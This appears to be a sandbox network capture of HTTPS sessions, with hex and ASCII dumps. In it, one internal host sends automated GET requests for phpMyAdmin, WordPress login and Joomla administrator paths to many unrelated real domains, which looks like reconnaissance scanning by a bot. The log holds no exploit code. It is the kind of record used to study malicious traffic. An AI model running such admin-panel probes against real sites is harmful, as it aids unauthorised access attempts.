2024-02-20 23:26:13 UTC	501	IN	Data Raw: 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 54 75 65 2c 20 32 30 20 46 65 62 20 32 30 32 34 20 32 33 3a 32 36 3a 31 32 20 47 4d 54 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 4b 42 55 33 68 43 30 50 4c 37 6f 4a 54 25 32 46 65 59 6f 25 32 46 6b 47 55 77 68 51 47 63 25 32 46 6b 35 69 56 68 55 46 52 52 31 51 77 4b 32 68 46 48 6d 37 6e 33 4c 5a 55 7a 4d 32 38 39 4f 70 59 58 4f 66 62 4b 6b 35 50 35 49 51 48 25 32 42 57 6c 52 63 39 65 39 25 32 46 58 4d 77 57 72 47 35 4b 6d 31 38 57 53 51 64 Data Ascii: last-modified: Tue, 20 Feb 2024 23:26:12 GMTCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KBU3hC0PL7oJT%2FeYo%2FkGUwhQGc%2Fk5iVhUFRR1QwK2hFHm7n3LZUzM289OpYXOfbKk5P5IQH%2BWlRc9e9%2FXMwWrG5Km18WSQd
2024-02-20 23:26:13 UTC	1369	IN	Data Raw: 34 37 64 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 2c 6e 6f 74 72 61 6e 73 6c Data Ascii: 47da<!doctype html><html lang="en" dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="referrer" content="no-referrer"> <meta name="robots" content="noindex,nofollow,notransl
2024-02-20 23:26:13 UTC	1369	IN	Data Raw: 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 61 6a 61 78 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 6b 65 79 68 61 6e 64 6c 65 72 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2e 6d 69 6e 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 Data Ascii: src="js/dist/ajax.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/keyhandler.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/vendor/jquery/jquery-ui.min.js?v=5.2.1"></script>
2024-02-20 23:26:13 UTC	1369	IN	Data Raw: 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 64 6f 63 6c 69 6e 6b 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 66 75 6e 63 74 69 6f 6e 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a Data Ascii: <script data-cfasync="false" type="text/javascript" src="js/dist/doclinks.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/functions.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="j
2024-02-20 23:26:13 UTC	1369	IN	Data Raw: 6a 73 2f 64 69 73 74 2f 63 6f 64 65 6d 69 72 72 6f 72 2f 61 64 64 6f 6e 2f 6c 69 6e 74 2f 73 71 6c 2d 6c 69 6e 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 74 72 61 63 65 6b 69 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 65 72 72 6f 72 5f 72 65 70 6f 72 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f Data Ascii: js/dist/codemirror/addon/lint/sql-lint.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/vendor/tracekit.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/error_report.js?v=5.2.1"></
2024-02-20 23:26:13 UTC	1369	IN	Data Raw: 6c 6f 73 65 54 65 78 74 20 3d 20 27 44 6f 6e 65 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 70 72 65 76 54 65 78 74 20 3d 20 27 50 72 65 76 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6e 65 78 74 54 65 78 74 20 3d 20 27 4e 65 78 74 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 63 75 72 72 65 6e 74 54 65 78 74 20 3d 20 27 54 6f 64 61 79 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6d 6f 6e 74 68 4e 61 6d 65 73 20 3d 20 5b 0a 20 20 20 20 27 4a 61 6e 75 61 72 79 27 2c 0a 20 20 20 20 27 46 65 62 72 75 61 72 79 27 2c 0a 20 20 20 20 27 4d 61 72 63 68 27 2c 0a 20 20 20 20 Data Ascii: loseText = 'Done'; $.datepicker.regional[''].prevText = 'Prev'; $.datepicker.regional[''].nextText = 'Next'; $.datepicker.regional[''].currentText = 'Today'; $.datepicker.regional[''].monthNames = [ 'January', 'February', 'March',
2024-02-20 23:26:13 UTC	1369	IN	Data Raw: 27 27 5d 2e 73 65 63 6f 6e 64 54 65 78 74 20 3d 20 27 53 65 63 6f 6e 64 27 3b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 5f 64 65 66 61 75 6c 74 73 2c 20 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 29 3b 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 65 78 74 65 6e 64 69 6e 67 56 61 6c 69 64 61 74 6f 72 4d 65 73 73 61 67 65 73 20 28 29 20 7b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 76 61 6c 69 64 61 74 6f 72 2e 6d 65 73 73 61 67 65 73 2c 20 7b 0a 20 20 20 20 72 65 71 75 69 72 65 64 3a 20 27 54 68 69 73 5c 75 30 30 32 30 66 69 65 6c 64 5c 75 30 30 32 30 69 73 5c 75 30 30 32 30 72 65 71 75 69 72 65 64 27 2c 0a 20 20 20 20 72 65 6d 6f 74 65 3a 20 27 50 6c 65 61 73 65 5c 75 30 30 32 30 66 69 78 5c 75 30 Data Ascii: ''].secondText = 'Second'; $.extend($.timepicker._defaults, $.timepicker.regional['']);}function extendingValidatorMessages () { $.extend($.validator.messages, { required: 'This\u0020field\u0020is\u0020required', remote: 'Please\u0020fix\u0
2024-02-20 23:26:13 UTC	1369	IN	Data Raw: 61 78 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 6c 65 73 73 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 30 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 6d 69 6e 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 67 72 65 61 74 65 72 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 Data Ascii: ax: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020less\u0020than\u0020or\u0020equal\u0020to\u0020\u007B0\u007D'), min: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020greater\u0020than\u0020or\u0020equal\u0020to\u0020\u007B
2024-02-20 23:26:13 UTC	1369	IN	Data Raw: 75 65 72 79 2f 6a 71 75 65 72 79 2e 76 61 6c 69 64 61 74 65 2e 6d 69 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2d 74 69 6d 65 70 69 63 6b 65 72 2d 61 64 64 6f 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 64 65 62 6f 75 6e 63 65 2d 31 2e 30 2e 36 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 6e 75 5f 72 65 73 69 7a 65 72 2e 6a 73 27 2c 20 31 29 0a 20 20 2e 61 64 64 28 27 63 72 6f 73 73 5f 66 72 61 6d 69 6e 67 5f 70 72 6f 74 65 63 74 69 6f 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 73 73 61 67 65 73 2e 70 68 70 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 63 6f 6e 66 69 67 2e 6a 73 Data Ascii: uery/jquery.validate.min.js', 0) .add('vendor/jquery/jquery-ui-timepicker-addon.js', 0) .add('vendor/jquery/jquery.debounce-1.0.6.js', 0) .add('menu_resizer.js', 1) .add('cross_framing_protection.js', 0) .add('messages.php', 0) .add('config.js
2024-02-20 23:26:13 UTC	1369	IN	Data Raw: 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 6e 61 76 69 67 61 74 69 6f 6e 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 69 6e 64 65 78 65 73 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 63 6f 6d 6d 6f 6e 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 70 61 67 65 5f 73 65 74 74 69 6e 67 73 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 76 65 6e 64 6f 72 2f 74 72 61 63 65 6b 69 74 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 65 72 72 6f 72 5f 72 65 70 6f 72 74 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 Data Ascii: X.fireOnload('navigation.js'); AJAX.fireOnload('indexes.js'); AJAX.fireOnload('common.js'); AJAX.fireOnload('page_settings.js'); AJAX.fireOnload('vendor/tracekit.js'); AJAX.fireOnload('error_report.js'); A

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.6	60434	13.248.243.5	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:12 UTC	214	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: strategicimpact.com.au Accept: / Accept-Encoding: deflate, gzip Cookie: dps_site_id=us-east-1 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:12 UTC	288	IN	HTTP/1.1 404 Not Found Content-Type: text/html;charset=utf-8 Content-Length: 964 Vary: Accept-Encoding Server: DPS/2.0.0+sha-c81b86d X-Version: c81b86d X-SiteId: us-east-1 Set-Cookie: dps_site_id=us-east-1; path=/; secure Date: Tue, 20 Feb 2024 23:26:12 GMT Connection: close
2024-02-20 23:26:12 UTC	964	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxco

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.6	60539	13.248.169.48	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:12 UTC	175	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: acidvision.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:12 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/html Content-Length: 315 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-13b" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_V8G0Hw4KT6swMU3PP3m7jMqkc5SqliE5Cpg1xMNgYAnWRULLZLCWicc2iiNkVji2bnh0Xtv647BSJj36JDoNQw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:12 UTC	315	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2d 6c 61 6e 64 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 66 6f 72 77 61 72 64 65 72 2e 39 39 36 32 64 30 30 30 2e 6a Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.j

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.6	60620	75.2.70.75	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:12 UTC	232	OUT	GET /administrator/index.php HTTP/1.1 Host: eyegage.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://www.eyegage.com/administrator
2024-02-20 23:26:12 UTC	195	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.eyegage.com/administrator/index.php
2024-02-20 23:26:12 UTC	166	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.6	60799	62.210.211.126	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:12 UTC	185	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: voltage-distribution.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:12 UTC	180	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:12 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 287 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-02-20 23:26:12 UTC	287	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 76 6f 6c 74 61 67 65 2d 64 69 73 74 72 69 62 75 74 69 6f 6e 2e 63 6f 6d 20 50 6f Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at voltage-distribution.com Po

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.6	60892	13.248.169.48	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:12 UTC	176	OUT	GET /wp-login.php HTTP/1.1 Host: acidvision.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:12 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/html Content-Length: 315 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-13b" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_ZQlg/84PVzjoaaxkTMYmiXPQODpt2GVoHOqbr57FvdSBENmk9o7F5WFxP/kDEeb1rhuY8StOPWvaUmNiI8uBEQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:12 UTC	315	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2d 6c 61 6e 64 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 66 6f 72 77 61 72 64 65 72 2e 39 39 36 32 64 30 30 30 2e 6a Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.j

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.6	60891	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:12 UTC	174	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: blauthlaw.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:12 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_fcSyu5dwZkLvduz3ItR9m0czqXSIaOzQ/WOyNVRbvX449yWzjRITIbIR4ta3rOvfhrbmlDjjUrCRmHSr/IrFQw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parkweb;Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:12 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link 